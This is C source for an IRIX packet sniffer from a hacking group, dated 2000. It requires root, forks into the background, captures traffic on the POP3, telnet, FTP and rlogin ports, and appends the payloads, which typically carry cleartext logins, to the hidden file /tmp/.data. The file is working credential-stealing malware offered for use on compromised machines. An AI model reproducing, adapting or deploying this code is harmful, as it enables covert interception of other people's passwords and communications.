/*
 * IRIX sniffer Based on snoop.c
 *
 * By: Zhodiac <zhodiac@softhome.net> !H'2000
 *     http://hispahack.ccc.de 
 *
 * This code is due to the only inspiration i have, [CrAsH]] :*****
 *
 * Madrid, 28/12/2000
 *
 * Spain r0x
 *
 */

/* INCLUDES */

#include <stdlib.h>
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in_systm.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <stdio.h>
#include <strings.h>
#include <sys/types.h>
#include <net/raw.h>
#include <netinet/if_ether.h>

/* DEFINES */

#define ETHERHDRPAD     RAW_HDRPAD(sizeof(struct ether_header))
#define FILE_LOG        "/tmp/.data"
#define INTERFACE	"ef0"

/* STRUCTS */

 struct etherpacket {
   struct snoopheader snoop;
   char pad[ETHERHDRPAD];
   struct ether_header ether;
   char data[ETHERMTU];     
  };

  struct snoopfltr {
   u_long sf_mask[SNOOP_FILTERLEN];
   u_long sf_match[SNOOP_FILTERLEN];
   u_short sf_allocated:1,
           sf_active:1,
           sf_promisc:1,
           sf_allmulti:1,
           sf_index:SNOOP_MAXFILTSHIFT;
   u_short sf_port;
   };



int main (int argc, char **argv)
{
 int cc=60000,on=1;
 int s;
 struct sockaddr_raw sr;
 struct etherpacket ep;
 struct snoopfltr sf;
 struct ip *iph;
 struct tcphdr *tcph;
 char *source, *destination;
 char *pdata;
 FILE *fd;
   
   if (geteuid()!=0) {
      printf ("R00t needed lol\n");
      exit(-1);
      }
 
   if((s=socket(PF_RAW,SOCK_RAW,RAWPROTO_SNOOP))<0) {
      perror ("socket()");
      exit(-1);
      }

   sr.sr_family = AF_RAW;
   sr.sr_port = 0;
   strncpy(sr.sr_ifname,INTERFACE, sizeof sr.sr_ifname);

   if (bind(s,&sr,sizeof(sr))<0) {
      perror ("bind()");
      exit(-1);
      }
         
  bzero((char *) &sf, sizeof sf);
  ioctl(s, SIOCADDSNOOP, &sf);
 
  setsockopt(s,SOL_SOCKET,SO_RCVBUF,(char *)&cc,sizeof(cc));
  ioctl(s,SIOCSNOOPING,&on);

  if (fork()) exit(0);
  
  while(1) {

   memset(&ep,0,sizeof(ep));
    
   cc = read(s,(char *)&ep,sizeof(ep));
   if ((cc>sizeof(struct ip)) && (ep.data[0]==0x45) && 
       (ep.data[9]==0x06)) {
       
       iph=(struct ip *)ep.data;
       tcph=(struct tcphdr *)(ep.data+4*iph->ip_hl);
       pdata=(char *)(ep.data+4*iph->ip_hl+sizeof(struct tcphdr));

       if (((tcph->th_dport==htons(110)) ||
            (tcph->th_dport==htons(23))  ||
            (tcph->th_dport==htons(21))  ||
            (tcph->th_dport==htons(513))) &&
            (*pdata!='\0')) {

             source=strdup(inet_ntoa(iph->ip_src));
             destination=strdup(inet_ntoa(iph->ip_dst));

             fd=fopen(FILE_LOG,"a+");
             fprintf (fd,"%s [%i] --> %s [%i] %s\n",source,
                                                ntohs(tcph->th_sport),
                                                destination,
                                                ntohs(tcph->th_dport),
                                                pdata);
             fclose(fd);
             }
       } 
    }
}